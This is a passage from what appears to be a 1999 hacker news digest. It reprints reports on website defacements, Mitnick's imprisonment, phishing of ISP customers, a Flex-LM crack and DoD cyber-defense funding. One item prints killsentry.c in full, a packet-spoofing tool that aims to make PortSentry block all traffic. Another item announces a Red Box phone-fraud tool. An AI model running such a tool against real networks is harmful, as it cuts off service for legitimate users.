"Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days, and the computer system was reconfigured. Although Burns took credit for the attack during an Internet chat session, he told the judge he simply had provided advice to others on how to do it, the prosecutors said. Story Copyright © 1999 Reuters Limited. All rights reserved. Wired; http://www.wired.com/news/print_version/email/explode-infobeat/politics/story/21625.html?wnpg=all NATO Cracker Pleads Guilty Reuters 3:00 a.m. 8.Sep.99.PDT A 19-year-old computer hacker with the screen name "Zyklon" pleaded guilty Tuesday to attacks involving Web pages for NATO, Vice President Al Gore, and the United States Information Agency, prosecutors said. Prosecutors from the US Attorney's Office said Eric Burns of Shoreline, Washington, also admitted in federal court in Virginia that he advised others on how to attack the White House Web site in May. They said Burns faced a maximum possible punishment of five years in prison, a US$250,000 fine and having to pay restitution. His sentencing was scheduled for 19 November before US District Judge James Cacheris. Burns acknowledged the computer intrusions had caused damages exceeding $40,000, the prosecutors said. He also admitted that he had hacked and damaged computers in Washington, Virginia, Washington state, and London. Prosecutors said Burns designed a program called "Web bandit" to identify computers on the Internet vulnerable to attack. He found that the computer server at Electric Press in Reston, Virginia, was vulnerable and attacked it four times between August 1998 and January 1999, they said. Electric Press hosted the Web pages for NATO, the vice president, and the USIA. Prosecutors said the attacks affected embassy and consular Web sites, which depend on the USIA for information. One attack resulted in the closing down of the USIA Web site for eight days. Prosecutors said Burns also attacked the Web pages of about 80 businesses whose pages were hosted by Laser.Net in Fairfax, Virginia. There were further attacks on the Web pages of two corporate clients of Issue Dynamics in Virginia and Washington, as well as the University of Washington Web page. Prosecutors said Burns also ranged overseas, hitting an Internet service provider in London. Burns usually replaced the Web pages with his own, which often made references to "Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days and the computer system was reconfigured. Copyright 1999 Reuters Limited. @HWA 06.0 Mitnick Transferred to Lompoc Federal Prison ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by punkis Kevin Mitnick has finally been transferred to the facility where he will spend the remainder of his sentence. It was hoped that he would be sent to the Nellis Federal Prison Camp, where living and working conditions would be a little better than what he's lived with for the past four and a half years he spent awaiting trial. He would also be closer to his mother and grandmother. Unfortunately he has been sent to Lompoc Federal Correctional Institution. Free Kevin http://www.freekevin.com Bureau of Prisons http://www.bop.com @HWA 07.0 C-Span Web Site Defaced ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Wolf D The cable TV network C-SPAN, which broadcasts House and Senate proceedings and other public affairs programming, had its web page defaced by a group known as the 'United Loan Gunmen'. CNN http://www.cnn.com/TECH/computing/9909/05/cspan.hacked.ap/ CMP TechWeb http://www.techweb.com/wire/story/TWB19990906S0002 Associated Press - Via Yahoo http://dailynews.yahoo.com/h/ap/19990905/tc/c_span_hacked_2.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html CNN; Hackers hit Web site of C-SPAN September 6, 1999 Web posted at: 2:10 a.m. EDT (0610 GMT) WASHINGTON (AP) -- Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band. The hackers, calling themselves "United Loan Gunmen," also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC. Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night. The C-SPAN site has since been repaired. The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. The Attrition site contains a mirror of the hacked version. Copyright 1999 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. CMP; Crackers Deface C-SPAN Website By Guy Middleton, TechWeb Sep 6, 1999 (5:26 AM) URL: http://www.techweb.com/wire/story/TWB19990906S0002 Crackers have defaced the Website of U.S. cable tv channel C-SPAN, according to the Associated Press. The crackers, who dubbed themselves the "United Loan Gunmen" (ULG) posted a transcript of a Dead Kennedys song on the site, which contained a fictional discussion between a U.S. government official and a Middle Eastern politician. The ULG presented the transcript as real and said it was discovered, encrypted, on C-SPAN's network. Associated Press; Sunday September 5 11:38 PM ET Hackers Vandalize C-Span Web Site WASHINGTON (AP) - Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band. The hackers, calling themselves ``United Loan Gunmen,'' also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC. Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night. The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. @HWA 08.0 killsentry.c a Port Sentry killer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by the author via wyze1, this piece of code will crash Port Sentry a common internet firewall program. - Ed /* killsentry.c (c) 1999 Vortexia / Andrew Alston Excuse the crappy coding, this code was written when I was very bored, had nothing better to do, and felt like proving the point that automatic firewalling is a bad idea. The code spoofs FIN packets from sequential internet hosts, starting at 1.0.0.0 and going right through to 255.255.255.255, sending 15 packets from each, one packet each to port 100 to 115. Feel free to modify this code, if you use the code for anything, please give me credit where it is due. I hold no responsibility for anything this code is used for, I give no guarantees that this code works, and I hold no responsibility for anything this code does to any system you run it on. If you screw up with it, its your problem, not mine. The code compiles 100% fine with no warnings on FreeBSD 3.2, I dont know about any other platforms or systems. Greets and shoutouts: Wyze1 - Thanks for the moral support, here is something you may use in Forbidden Knowledge Sniper - My partner in crime, you rock Timewiz - What can I say, thanks for ideas for projects still coming Moe1 - For all the information Ive had from you - Its appreciated Uglykidjoe - For things said and done - I owe you Hotmetal - A general greet Bretton Vine - Dont worry the underground you hate so much still loves you Everyone else in #hack on irc.electrocity.com - You guys rock Curses, fuckoffs, and the like - Logik - Get a clue, skript kiddie life aint the way Gaspode - I dont think I even need this - a major FUCK YOU and I hope you get castrated with a rusty spoon - take your god like attitude and shove it up your ass Sunflower - May you fall pregnant to one of the many ircops you screw Anyone else that I dislike but cant think of right now - FUCK YOU Anyone who dislikes me - FUCK YOU */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { #define TARGETHOST "209.212.100.196" int octet1, octet2, octet3, octet4; int i; int sock; int on = 1; struct sockaddr_in sockstruct; struct ip *iphead; struct tcphdr *tcphead; char ipkill[20]; char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)]; struct in_addr spoof, target; int seq, ack; bzero(&evilpacket, sizeof(evilpacket)); // Very bad way to generate sequence numbers srand(getpid()); seq = rand()%time(NULL); ack = rand()%time(NULL); if(argc < 2) { printf("Usage: %s target_host\n",argv[0]); exit(-1); }; target.s_addr=inet_addr(TARGETHOST); if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } sockstruct.sin_family = AF_INET; iphead = (struct ip *)evilpacket; tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip)); iphead->ip_hl = 5; iphead->ip_v = 4; iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); iphead->ip_id = htons(getpid()); iphead->ip_ttl = 255; iphead->ip_p = IPPROTO_TCP; iphead->ip_dst = target; iphead->ip_sum = 0; iphead->ip_tos = 0; iphead->ip_off = 0; tcphead->th_sport = htons(80); tcphead->th_seq = htonl(seq); tcphead->th_ack = htonl(ack); tcphead->th_win = htons(512); tcphead->th_flags = TH_FIN; tcphead->th_off = 0x50; for(octet1 = 1; octet1 <= 255; octet1++) for(octet2 = 0; octet2 <= 255; octet2++) for(octet3 = 0; octet3 <= 255; octet3++) for(octet4 = 0; octet4 <= 255; octet4++) { bzero(ipkill, 20); sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4); for(i = 100; i <= 115; i++) { tcphead->th_dport = htons(i); sockstruct.sin_port = htons(i); spoof.s_addr = inet_addr(ipkill); iphead->ip_src = spoof; sockstruct.sin_addr = spoof; sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct sockaddr *)&sockstruct, sizeof(sockstruct)); } } return(1); }; @HWA 09.0 W. Richard Stevens dead at 48 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com W. Richard Stevens - Dead at 48 contributed by evil wench W. Richard Steven noted technology author and teacher died last Wednesday. Stevens was best known for his UNIX Network Programing series and and TCP/IP Illustrated book. The family has asked that in lieu of flowers, donations be made in Richard's name to Habitat for Humanity, 2950 E. 22nd Street, Tucson, AZ 85713. He is survived by his wife and three children. The cause of death was not reported. Big Deal Classifieds - His Obituary http://www.bigdealclassifieds.com/classified/plsql/classlevel3_step?wClass=0002&wPubdate=Friday&wRowstart=2&wLessOrMore= Habitat for Humanity http://www.habitat.org/ Some books written by Richard Stevens: TCP/IP Illustrated, Volume 1 : The Protocols Unix Network Programming : Networking Apis: Sockets and Xti (Volume 1) UNIX Network Programming: Interprocess Communications (Volume 2) Advanced Programming in the Unix Environment Unix Network Programming @HWA 10.0 New Palm Pilot RedBox for Canada is Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Hack.Canada Cyb0rg/asm has released a new, stand-alone version of RedPalm, a Canadian Red Box for the Palm Pilot. This revision corrects timing issues related to processor clock speed on the newer Pilots, as well as featuring quarter, dime, and nickel tones and a snazzy new interface. (This will not work in the US or most other countries due to differences in the types of tones the various phone systems use.) Hack Canada http://www.hackcanada.com/homegrown @HWA 11.0 Windows2000test Suffers Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond A poison packet attack directed against window2000test.com has been claimed to have been successful by the perpetrators. Microsoft claims the server withstood the attack and manually disabled the attackers. (Why are people wasting their time with this? Go do something useful.) C|Net http://www.news.com/News/Item/Textonly/0,25,41287,00.html?pfv Hackers answer Microsoft's Windows 2000 dare By Stephen Shankland Staff Writer, CNET News.com September 3, 1999, 12:55 p.m. PT URL: http://www.news.com/News/Item/0,4,41287,00.html Hackers have answered Microsoft's dare and disabled part of a Windows 2000 server, but both sides are claiming victory. A group of hackers say they disabled part of the server that Microsoft put on the Web as a test for those who think they can breach the system's security. Two attacks that took down the guest book section of the Windows 2000 Beta Internet Test Site took place yesterday. The group sent "poison packets" to the server. The packets masqueraded as small chunks of information but actually were quite large, said George Davey, a leader of the effort. Microsoft confirmed the attack, saying technicians manually disconnected the attackers. While the server's CPU was working to swallow the larger-than-expected data packets, the guest book page was inaccessible. However, the overall system didn't crash and the attackers didn't seize control, said Keith White, director of marketing for Microsoft's business and enterprise division. CNET News.com verified that the guest book didn't appear during one of the attacks yesterday, returning the error message "There is a problem with the page you are trying to reach and it cannot be displayed... Internal server error." Computer security is an increasingly important field as companies move more services to the Internet, often with publicly accessible Web sites that allow visitors to interact with corporate computers. Microsoft wants to make Windows 2000 "the most secure version of Windows ever, both in terms of feature functionality, and system design," the Web site says. Microsoft's site has "ground rules" that exhort would-be attackers to "find the interesting 'magic bullet' that will bring the machine down" and see if they can find "hidden messages sprinkled around the computer." Both sites declared victory. Davey said his group succeeded in getting past some of the computer's defenses, and Microsoft said it succeeded in keeping the machine running and finding new vulnerabilities to address. "This is exactly what we want customers to do with this site," White said. Shortly after the test site went up, the same server was taken down by a lightning storm, but Microsoft also acknowledged at the time that the guest book program had been compromised. Since the site was switched on a month ago, Microsoft has found and fixed four bugs in how the server handles Internet information, White said. An attacker crashed the machine August 17, Microsoft said. Tests only moderately useful Putting a server up for would-be attackers to pound on allows companies to find new security holes, but "a lot of these challenges are more to help the perception that the machine is secure," said Christopher Klaus, chief technology officer of Internet Security Systems. The most serious computer crackers won't participate in such challenges because they don't want to show their hand, Klaus said. "Some people who know how to break in may not want to disclose all their secrets," Klaus said. "If a robber has a master key to break into every building in the world, he's not going to go to the FBI and demonstrate." Windows NT and 2000, as well as Unix and other operating systems, aren't particularly secure unless set up properly, Klaus said. "Most systems out there by default are wide open in terms of security issues," he said, but "can be made pretty secure if configured properly and locked down." More dangerous today are the software applications that reside on top of the operating system. E-commerce has raised a host of new problems because it involves many applications, Klaus said. "Most hackers simply go around it by going through the application layer. As we're seeing e-commerce take off, the hacker's target isn't a small bull's-eye." Attacking the Web server The attacks on the Microsoft server yesterday came through the Active Server Pages (ASP) component of Microsoft's Internet Information Services (IIS) Web server software, Davey said. In testing the attack on his own Windows 2000 servers, he said restarting the server didn't fix the problem; instead, the IIS software had to be reinstalled. Also on the test server, the attack caused the computer's CPU usage to jump to 100 percent. On the Microsoft site, the computer returned to normal once the access was shut down. "Most people don't have the expertise to selectively shut off [specific Internet addresses] like that," Davey said today. "Had they not shut us off, it would have killed their machine." Davey thought it notable that the Microsoft server initially made no mention of the ASP problems. "Why don't you guys mention any of the ASP downtime that we have documented?" he asked in an email to Microsoft. Notification of the attack appeared on the Web site at 10 a.m. today, after CNET News.com called Microsoft about the attack. The machine is running a beta, or test version, of Windows 2000, on a Pentium III chip with 256 MB of memory. The machine has been configured to make access difficult, Davey and Microsoft said. However, as the test continues, the company likely will open up more access channels known as "ports" to test it more heavily. Davey said the challenge of breaking into the system is fun. "Normally, you can't hack, because it's illegal." He praised Windows 2000 as "by far the best thing ever released by Microsoft." But there's still room for improvement. "All these open holes that get shut up will lead to a more secure server," Davey said. @HWA 12.0 Flex-LM Security Breached ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Arik A security hole has been found in Globetrotter Software Inc.'s Flex-LM, a software package used to prevent pirating of electronic design automation (EDA) tools. The breach allows end users to generate keys to bypass the software's copy protection schemes. Some EDA tools retail for upwards of $44,000 per user. Electronic News http://www.electronicnews.com/enews/news/1229-246NewsDetail.asp Hackers compromise software used to protect EDA tools Sep 03, 1999 --- A group of hackers have compromised Globetrotter Software Inc.'s Flex-LM, a software package used by electronic design automation (EDA) tools providers to protect software tools licensed to end-users. EDA industry veteran John Cooley, who was informed of the hack by a colleague, reported the incident this afternoon in ESNUG, his EDA industry newsletter. Only limited details related to the nature of the hack were posted due to its pervasive nature. Virtually all of the EDA vendors license their software using Globetrotter's Flex-LM. The software breach has been posted to an undisclosed Web site that offers free downloads. Another Web site provides tutorials for using the cracked code. With some tools costing $44,000 plus per seat, the "free" key carries a heavy toll. The 6 Meg download allows its users to generate keys that open any Windows-NT based EDA software package to end-users. Essentially, the software renders any existing or protected evaluation copy into a "free" copy by allowing the user to key into the software indefinitely. The networking of NT and UNIX systems probably means this crack could enable the "free" use of UNIX based EDA tools, Cooley said. Cooley did not disclose the site, offering instead to inform authentic EDA company representatives of its whereabouts. Since posting the news this afternoon, the EDA veteran said he has received more that 48 emails from EDA vendors either confirming the hack or requesting more information about the break in Flex-LM. Globetrotter representatives could not be reached for comment by press time. @HWA 13.0 Customers of Numerous ISPs Victims of Fraud ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Dark VVulf A new and interesting form of fraud has appeared around the net. It works like this, a new but similar web site is set up, then the ISPs user base is spamed telling them that their accounts are over due. The email directs the users to the fake web site and asks them to reenter their credit card information. The users then find large charges on their credit card bills. At least three ISPs have been hit with this scam. Wired http://www.wired.com/news/news/technology/story/21572.html New Web Scam Attacks ISPs by Chris Oakes 3:00 a.m. 3.Sep.99.PDT "According to our records, your payment for your Internet access account is late. Perhaps you overlooked it? ...It is very important that you contact us as soon as possible. To update your account information, please go to http://www.valuehelp.net." Oh, and once you get there, we'll rob you blind. Customers of California ISP Value Net received such a message this week, signed by "Sheila Baker, Administrative Assistant." Problem was, it was a scam. ISP abuse experts and the Secret Service say it looks like a new and sophisticated brand of Web scam that is bound to get worse. "It's particularly scary because of the nature of it. It all looks real, and it's easy to perpetrate," said Patrick Greenwell, an Internet consultant who's seen all types of electronic spams and scams come and go. Value Net president Tom Fawcett said at least one of the customers who visited the site entered a credit card number. After Value Net alerted him to the fraud, the customer discovered a substantial unauthorized charge on his account. "When you go to that Web site, a dialog first comes up and says you are entering a secure Web site at Value Net. You're not -- but it says you are," said Fawcett. "They went to a lot of work to make it appear legitimate." The spoof site uses a closely related domain name -- in this case, valuehelp.net, a convincing spin on value.net. Once there, users encountered a form telling them to re-enter their email, name, address, credit card information, and more. Fawcett wasn't sure how many Value Net customers had responded to the email. But he said the ISP received 30 responses to its scam alert notice warning customers not to respond to the phony instructions. The fraudulent site was still operational Thursday morning, but the New Jersey-based service provider hosting the domain shut the site down by the end of the day. Value Net is not the first ISP to encounter such a scam. Peter Veeck, a network administration consultant for Sherman, Texas, ISP Internet Texoma reported that his customers were targeted by a similar fraudulent email in July. One other ISP also confirmed it had been targeted by the same type of fraud, but declined to go on record.Internet Texoma customers were instructed to send their credit card numbers to an address at a free Web-based email service. "There were only about four [customers] that responded," Veeck said. "We caught it pretty quickly." The practice has early roots in scams targeting America Online members several years ago. Though sometimes successful, these scams often had telltale flaws, however, such as obviously fishy return email and Web addresses and crude site mock-ups. The sophistication of the scam perpetrated on Value Net customers represents an alarming refinement of the technique to Internet abuse experts.It also appears to be targeting more mom-and-pop ISPs, rather than just AOL. Value Net's Fawcett stressed that his customers were also alerted -- and protected -- within half an hour of the fraudulent email transmission Wednesday. Value Net customers attempting to visit the URL were redirected to a page containing a warning about the scam. When Fawcett contacted 9 Net Avenue, the fraudulent site's host ISP, the service told him they would not shut the offending down without a court order. So Fawcett turned to the FBI. Since the matter involved credit card fraud, the FBI directed him to the Secret Service, which took prompt action. "We looked at Mr. Fawcett's Web site and compared it to the one that this illegitimate company had set up ... and we were able to match the link to a person down in San Diego who's operating this illegal Web site," said Andrew Dengler, special agent for the San Francisco field office of the Secret Service. Dengler said the San Diego branch of the Secret Service has launched an investigation into the registered domain holder. The Value Net scam was the first for his field office, Dengler said. But he expects more. So do Veeck and Fawcett. "I'm positive that in the next couple of months we're going to see more of this kind of activity," Dengler said. "And I'm optimistic we're going to see more laws passed to help us deal with it." Meanwhile, Fawcett wasn't happy that it took Secret Service involvement to get 9 Net Avenue to act to solve the problem before it wreaked havoc on his customers' credit card accounts. "Most ISPs cooperate and get people to take it down or modify the site," Fawcett said. "But these guys at 9 Net Avenue, they just stiff-armed us." Patrick McGilloway, director of client services for 9 Net Avenue, said the ISP was just following due process to ensure the complaint was legitimate. "Of course, Tom and Value Net wanted to make sure it was shut off the moment he complained, and we had to make sure who we were dealing with." The Secret Service's Dengler agreed that 9 Net Avenue wasn't necessarily wrong to say it needed a court order. "They were just covering themselves legally.... It's something that's very new right now for the legal and prosecutorial community." Veeck, of Internet Texoma, doesn't necessarily agree that more laws are the solution. "If we as denizens of the Internet have to resort to law enforcement , then we give law enforcement control over the Internet. Is that something we want to do? ...Law enforcement should be involved. But the ISPs and everybody needs to work together when they can." @HWA 14.0 Air Force Asks to Preserve 'Panther Den' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond The Air Force has asked House and Senate appropriators to restore almost $500,000 recently cut from the FY 2000 budget. The monies were earmarked for a highly classified program to protect military computer networks from electronic attacks. The program is known as the 'Panther Den'. Further details on 'Panther Den' are unavailable due to its classified nature. JYA.com - originally from 'Inside the Air Force' http://jya.com/af-bio-bt.htm Inside the Air Force, September 3, 1999 Money to be used for information security AIR FORCE ASKS APPROPRIATORS TO PRESERVE FY-00 'PANTHER DEN' SPENDING Richard Lardner The Air Force has called on House and Senate appropriators to restore nearly $500,000 to a highly classified program the service maintains is a key part of its overarching effort to protect military computer networks from electronic attacks. While the amount of money at issue is modest when compared to other programs, an Air Force "budget/program fact paper" shipped to Capitol Hill and obtained by Inside the Air Force claims serious problems will result if the funding is left out of the fiscal year 2000 defense spending bill. "Eliminating this funding line would entirely halt the planned development of sophisticated techniques and technologies for defending systems against sophisticated information warfare and computer network attacks that are beyond commercially available protection systems," the appeal reads. In its FY-00 spending request, the Air Force sought $491,000 in research and development spending for the special access program, known as Panther Den. While Senate provided the requested amount in its FY-00 defense appropriations package, House appropriators did not, citing a desire to eliminate or consolidate budget line items with less than $1 million in funding. But the appeal paper charges the House appropriations position is shortsighted. "The House position, which implies the $0.5 million is used for 'legacy programs that have long since transitioned from development to production to fielding,' should not apply to this program," the paper reads. "This innovative project line is in its infancy in the emerging computer network defense field. . . . This program funds research and development in the Panther Den [SAP] which develops sensitive information operations technologies for the purpose of achieving information superiority," the document adds. According to the fact paper, the Air Force planned to double the annual funding level for Panther Den to $1 million per year beginning in FY-01. The service says boosting Panther Den spending is consistent with previous congressional direction. Specifically, the paper cites the classified annex from a May 1998 House National Security Committee report that states, "Moreover, considering the importance attached to attaining information assurance, the committee questions the meager resources that have been provided to the Panther Den program office." The House and Senate defense authorization committees fully funded the request. Special access programs, better known as "black" programs, are tightly controlled efforts. SAP managers are able to determine who has a "need to know" about the program, an authority that permits their programs to sometimes bypass standard oversight and administrative requirements. The appeal notes that in June the Air Force provided Congress with a "special access required" information paper, which the service says described "in detail" the projects it intends to pursue with the FY-00 funding. The Air Force, citing the classified status of the program, declined to provide additional details on Panther Den. Copyright Inside the Air Force Inside the Air Force, September 3, 1999 With kinetic solutions often 'untenable'. . . PENTAGON EYES INFO OPERATIONS IN BID TO DEFEAT DEEPLY BURIED TARGETS Richard Lardner Shortly after Operation Desert Storm concluded in 1991, defense officials began spending more time and money developing kinetic solutions for defeating what are known in military parlance as "hard and deeply buried targets" (HDBTs). The results have been promising: In a 1995 test conducted by the Air Force, for example, a specially configured ballistic missile penetrated 30 feet of granite. Yet using missiles and munitions to defeat HDBTs can be messy, particularly if the target is in a highly populated area. In addition, special operations forces, already taxed on other fronts, are unable to deal with the growing number of HDBTs, which often house command and control facilities or chemical and biological weapons plants. "It's a very hard problem, period," says retired Adm. Henry Chiles, former commander-in-chief of U.S. Strategic Command. HDBTs are "very tough to defeat." Given these constraints, military officials are now beginning to examine how the world of information warfare can help produce more sanitary ways to disable targets encased in concrete or carved into mountainsides. According to internal DOD budget documents, the latest Defense Planning Guidance directs the services, defense agencies and warfighting commands to develop concepts and doctrine to defeat "hard and deeply buried targets using the full range of capabilities, including . . . information operations." The U.S. intelligence community typically assesses hard targets based on physical or structural characteristics. The idea underpinning the IO concept is to look at these facilities more from a functional standpoint; specifically, determining what activities are performed at the facility as well as how that facility relies on information, information systems and information processes. "Planning and executing an IO-based capability requires detailed intelligence on, as well as access to, not only the target facility but the targeted system or technology -- more detail than is currently obtained to support physical or structural characterization," the documents state. But the budget documents, obtained by sister publication Inside the Pentagon, indicate the department is largely unprepared from an IO perspective to handle the DPG's instructions. "DOD currently does not have a clear understanding of how IO can be used to defeat HDBTs, how to plan for use of IO-based approaches for maximum operational effect, and what optimum investment strategy to use in funding IO-based capabilities," the documents state. Accordingly, the department is considering a proposal to spend $120.5 million between fiscal years 2001 and 2005 on a series of activities "to support planning and execution of IO-based approaches to defeating HDBTs." No final decisions on the funding have been made; however, the documents, prepared by Office of the Secretary of Defense staff for DOD's Program Review Group, make clear that meeting the DPG's instructions is an absolute must. "Lack of access, political constraints, and collateral effects make use of kinetic weapons untenable in many cases," the documents read. "In addition, the rapid proliferation of HDBTs exceeds the capabilities of Special Operations Forces options. "Without IO options, there will be no capability to defeat a significant amount of critical, strategic, HDBT threats." The effort described in the documents involve a variety of agencies, including the Defense Intelligence Agency, National Security Agency, National Reconnaissance Office, Defense Threat Reduction Agency and Joint Staff. The proposed effort consists of eight activities, all of which build upon an IO feasibility study begun in January and scheduled for completion in September 2000. The ultimate goal is a fully funded program that produces effective IO-based capabilities to counter HDBTs. According to the documents, the first activity refines and further develops "functional HDBT target characterization models initiated in the feasibility study," to include ballistic missile, command, control, communications, and weapons of mass destruction HDBT facilities. "Rather than focus on physical or structural characteristics of HDBT facilities, IO functional target characterization focuses on determining the reliance of HDBT facilities on information by identifying and characterizing the mission of the facility, functions required to perform the mission, supporting systems and processes, and critical information systems and processes," the documents state. The second activity uses one of the models as a template for a proof-of-concept demonstration. "This will provide DOD an indication of the required 'surge' capability within DOD and the intelligence community to turn one of the models from a template into an actual operational mission planning target model," the budget papers read. Activity three extends ongoing modeling and simulation development to provide additional analytic capability and "mature" evaluation tools. The fourth activity, the documents note, is aimed at determining how effective IO-based approaches are against HDBTs. The fifth element "determines and develops required capability to support software and hardware in the loop testing of IO-based capabilities against HDBTs," according to the papers. The sixth and seventh activities lead to an analysis of alternatives and a cost and operational effectiveness analysis, which are to provide an investment strategy for future IO programs. The eighth activity "funds application, and where necessary development, of near-term, high-payoff capabilities and systems identified during the AOA/COEA and for the next two years until services and agencies" finance the efforts on their own, the budget documents state. "This will ensure an interim capability exists." Given that DOD has no clear understanding yet of how to harness IO to take out HDBTs, the outcome of the proposed exercise is hard to predict. The concept, however, tracks with general philosophy of IO and, more specifically, information warfare. That is, some targets can be disabled without being physically destroyed. "What we need to better appreciate is the effects of the targeting that we are talking about and how to incorporate zeroes and ones into that," Air Intelligence Agency Commander Brig. Gen. John Baker said at an IO symposium in March "If all I want to do is shut down a particular corridor for 24 hours so I can send in assets to take out a particular target, then maybe all I need to do is send a string of zeroes and ones to shut that down and confuse it for 24 hours or two hours or 30 minutes. "I may not need to send somebody in there to blow it up," Baker concluded. Copyright Inside the Air Force @HWA 15.0 $19.6 Million Awarded to Create DOD IDS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by mortel The Defensive Information Warfare Technology Applications (DIWTA) contract, a four year $19.6 million agreement, has been awarded to Litton/PRC Inc. by the Air Force Research Laboratory Information Directorate, in Rome, N.Y. This contract requires the development of a development of an automated intrusion-detection system, which will be added to a larger DOD system to detect and gather data on computer intrusions. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0906/fcw-newsalarm-09-06-99.html SEPTEMBER 6, 1999 Sounding the alarm Air Force lab's intrusion-detection system is part of an overall system to warn DOD about cyberattacks BY DIANE FRANK (diane_frank@fcw.com) The Air Force Research Laboratory Information Directorate, Rome, N.Y., last month tapped Litton/PRC Inc. to build a system that will collect information on cyberattacks or other unauthorized users throughout the Air Force as part of a Defense Departmentwide effort to stem the increasing number of intrusions into DOD computer systems. The development of an automated intrusion-detection system, which will become a part of a larger DOD system to detect and gather data on computer intrusions, is the first task order under the Defensive Information Warfare Technology Applications (DIWTA) contract, awarded to a team headed by Litton/PRC last month. Under the four-year, $19.6 million contract, the systems integrator also will offer other information security solutions, including vulnerability and risk assessment, automated warning and response, and forensics. The contract also will be part of DOD's response to a directive issued by President Clinton last year, known as Presidential Decision Directive 63, which called on federal agencies to develop plans and systems to protect mission-critical computer systems. The Automated Intrusion Detection Environment (AIDE), the first project, will collect information from individual intrusion-detection systems throughout the Air Force to deposit into a central system. The data will be pulled together at local, regional and global levels to generate easily understood reports for administrators on different issues such as similar attacks at several sites. The AIDE is a joint effort between the research lab's Information Directorate and the Defense Information Systems Agency. The Rome site also is working with the commanders in chief at DOD commands worldwide to collect intrusion information. The data will flow into the Joint Task Force for Computer Network Defense, and the JTF-CND then will correlate the information on a global scale. "We are working across DOD...[and] in the end, feeding all of the information to DISA's Global Network Operations Security Center and the JTF-CND," said Brian Spink, the AIDE program manager and an electronics engineer at the Rome Research Site's Defensive Information Warfare Branch. The JTF-CND serves as the coordination center for DOD agencies and services to report computer security breaches and for responding to cyberattacks. But without the intrusion information from the Air Force and the other services, the JTF-CND is next to useless, said Kent Schneider, vice president and general manager of command, control, communications and intelligence systems at PRC. DIWTA and similar contracts will play a role in overall defense strategy, he said. "This contract is certainly not targeted only at Air Force requirements," Schneider said. "It will certainly be used to enhance their effort in the joint environment." PRC, in addition to facilitating the automation and creation of the central system, is developing a form of "adaptive" intrusion detection, an application that allows the system to learn from past intrusion signatures to recognize future intrusions even if the attacker is using no known method, Schneider said. "It's basically devising techniques and tools that allow you to take existing systems and systems in development and allow them to be monitored as a whole," Schneider said. "The idea of developing adaptive tools that can adjust to a variety of threats is recognizing that the problem is really an issue of defense in depth, with threats from outside and inside the organization." The work will focus on the Non-Classified Internet Protocol Router Network, which DOD uses to send unclassified messages, and DOD connections to the Internet, Spink said. NIRPNET and many DOD Web sites have come under such heavy fire from hackers and other unauthorized users that the department has contemplated cutting off all connections to the Internet. Work on the AIDE has been under way for more than a year. The Rome site had used other contracts for the work but decided to create the DIWTA contract last year to provide a more focused group of vendors and resources, Spink said. Through DIWTA, the Air Force has access to 30 vendors, including Booz-Allen & Hamilton Inc., Computer Sciences Corp., Litton/TASC Inc. and Trident Data Systems Inc., and future tasks under consideration will include technology from many of them, Spink said. @HWA 16.0 UK Plans Super Group to Crack Crypto ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond With a budget of Ł15-20 million, the UK will establish a group of specialist code-crackers. The unit is being set up to counter the growing use of encrypted e-mail by criminals. News Unlimited http://www.newsunlimited.co.uk/observer/uk_news/story/0,3879,79397,00.html E-squad 